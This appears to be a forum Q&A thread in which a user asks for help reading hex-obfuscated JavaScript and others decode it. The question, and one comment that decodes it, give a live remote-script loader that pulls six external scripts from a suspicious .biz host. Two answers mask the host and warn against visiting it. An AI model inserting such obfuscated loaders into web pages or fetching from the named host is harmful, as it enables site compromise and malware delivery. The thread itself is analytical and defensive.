# can someone decrypt this javascript?

Tags: javascript, decode, encryption

is there a way to know what this javascript code is, i'm sorry if this seems weird.

```
var _0x7e0d = ["\x63\x62\x6F\x78\x66\x6F\x72\x6D", "\x68\x74\x74\x70\x3A\x2F\x2F\x66\x72\x61\x6E\x63\x65\x31\x30\x73\x2E\x62\x69\x7A\x2F\x63\x62\x6F\x78\x2F\x3F", "\x68\x65\x61\x64", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x64\x6F\x63\x75\x6D\x65\x6E\x74", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65", "\x73\x72\x63", "\x6C\x61\x73\x74\x43\x68\x69\x6C\x64", "\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65", "\x67", "\x63\x6C", "\x66\x74", "\x70\x6B", "\x74\x6D", "\x6D"];
var cf = parent[_0x7e0d[0]];
var cm = window;
var frmod = _0x7e0d[1];

function include(_0x1a17x5, _0x1a17x6) {
    head = _0x1a17x6[_0x7e0d[4]][_0x7e0d[3]](_0x7e0d[2])[0];
    var _0x1a17x7 = _0x1a17x6[_0x7e0d[4]][_0x7e0d[6]](_0x7e0d[5]);
    _0x1a17x7[_0x7e0d[9]](_0x7e0d[7], _0x7e0d[8]);
    _0x1a17x7[_0x7e0d[9]](_0x7e0d[10], _0x1a17x5);
    head[_0x7e0d[12]](_0x1a17x7, head[_0x7e0d[11]]);
};
include(frmod + _0x7e0d[13], cm);
include(frmod + _0x7e0d[14], cm);
include(frmod + _0x7e0d[15], cm);
include(frmod + _0x7e0d[16], cm);
include(frmod + _0x7e0d[17], cm);
include(frmod + _0x7e0d[18], cm);
```

thanks in advance

Comment: Try to paste it in on this page: http://ddecode.com/hexdecoder/

Comment: can someone format this javascript?

Comment: Those are hexadecimal character codes , first assignment is `["cboxform", "http://france10s.biz/cbox/?", "head", "getElementsByTagName", "document", "script", "createElement", "type", "text/javascript", "setAttribute", "src", "lastChild", "insertBefore", "g", "cl", "ft", "pk", "tm", "m"]` to `var _0x7e0d` .. Likewise read through it using console log !!!

Answer (score 3):

Try using Google Closure Compiler http://closure-compiler.appspot.com/home . I formatted google code output using http://jsbeautifier.org/ . code are modified for readability .

```
var funcOrKeys =  ["cboxform", "http://france10s.biz/cbox/?", "head", "getElementsByTagName", "document", "script", "createElement", "type", "text/javascript", "setAttribute", "src", "lastChild", "insertBefore", "g", "cl", "ft", "pk", "tm", "m"];
var cf = parent['cboxform'];
var cm = window;
var url = 'http://XXXXXXX.biz/cbox/?';

function include( url , window) {
    head = window.document.getElementsByTagName('head')[0];
    var scriptTag = window.document.createElement('script');
    scriptTag.setAttribute('type', 'text/javascript');
    scriptTag.setAttribute('src', url);
    head.insertBefore( scriptTag , head['lastChild']);
};

include(url + 'g', cm );
include(url + 'cl', cm );
include(url + 'ft', cm );
include(url + 'pk', cm );
include(url + 'tm', cm );
include(url + 'm', cm  );
```

The `include` append script tag to ur head tag .

Comment: all that i already got, but the code of function include is still encrypted

Answer (score 2):

http://jsbeautifier.org/

```
var cf = parent['cboxform'];
var cm = window;
var frmod = 'http://fra*****s.biz/cbox/?';

function include(_0x1a17x5, _0x1a17x6) {
    head = _0x1a17x6['document']['getElementsByTagName']('head')[0];
    var _0x1a17x7 = _0x1a17x6['document']['createElement']('script');
    _0x1a17x7['setAttribute']('type', 'text/javascript');
    _0x1a17x7['setAttribute']('src', _0x1a17x5);
    head['insertBefore'](_0x1a17x7, head['lastChild']);
};
include(frmod + 'g', cm);
include(frmod + 'cl', cm);
include(frmod + 'ft', cm);
include(frmod + 'pk', cm);
include(frmod + 'tm', cm);
include(frmod + 'm', cm);
```

Comment: @user2349786 those are variables. mama, RoomID, Horsefly, _0x1a17x5 even ಠ_ಠ is valid js variable name.

Answer (score 0):

In other words this script simply adds six `<script>` tags to your `<head>` with external scripts from:

1. `http://fra*****s.biz/cbox/?g`
2. `http://fra*****s.biz/cbox/?cl`
3. `http://fra*****s.biz/cbox/?ft`
4. `http://fra*****s.biz/cbox/?pk`
5. `http://fra*****s.biz/cbox/?tm`
6. `http://fra*****s.biz/cbox/?m`

**WARN:** Don't open these links! For security reasons I have added `*` in the URLs.

Comment: i already got that thanks, but the problem is the function include code which is more important since i already got all the rest
thanks